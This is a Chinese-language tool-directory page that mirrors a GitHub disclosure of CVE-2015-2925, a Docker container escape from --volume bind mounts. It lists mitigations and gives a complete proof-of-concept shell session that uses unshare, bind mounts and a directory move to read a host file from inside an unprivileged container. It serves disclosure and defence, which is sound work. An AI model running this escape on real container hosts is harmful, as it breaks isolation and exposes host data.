Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
docker_cve-2015-2925 — Docker + CVE-2015-2925 = 从 --volume 中逃逸 | Kitploit
工具/GitHubGitHub/kagami/docker_cve-2015-2925
权限提升漏洞分析漏洞利用渗透测试红队容器逃逸
GitHubkagami/docker_cve-2015-2925

docker_cve-2015-2925

Docker + CVE-2015-2925 = 从 --volume 中逃逸

查看仓库
11211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Docker + CVE-2015-2925 = 从 --volume 逃逸

Linux 近期的一个漏洞 已知大约半年(公开几个月),它使得从绑定挂载(bind mounts)中逃逸成为可能。特别是在 Docker 的情况下,可以从通过 --volume 选项挂载的目录内部逃逸到对应宿主机的文件系统。

Docker 安全团队 已经知晓 该问题,并允许发布此内容以引起公众关注。

感谢 Jann Horn 指出这一点,基本上我只是复现了它。

缓解措施

以下任一项都足以缓解:

  • 启用 AppArmor 的内核和 AppArmor Docker 配置文件
  • 启用 SELinux 的内核和 SELinux Docker 策略
  • 在内核中禁用用户命名空间(user namespaces)

备注

  • 该问题尚未在 upstream 和各发行版中修复,且应适用于任何较新的内核
  • 这不需要容器内的 root 权限
  • 各发行版提供的 util-linux 包版本不同,unshare(1) 是其中一部分,在你的环境中可能会返回 "Operation not permitted";来自 Debian Jessie 的包经测试可正常工作

概念验证

root@kitploit:~
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
下载工具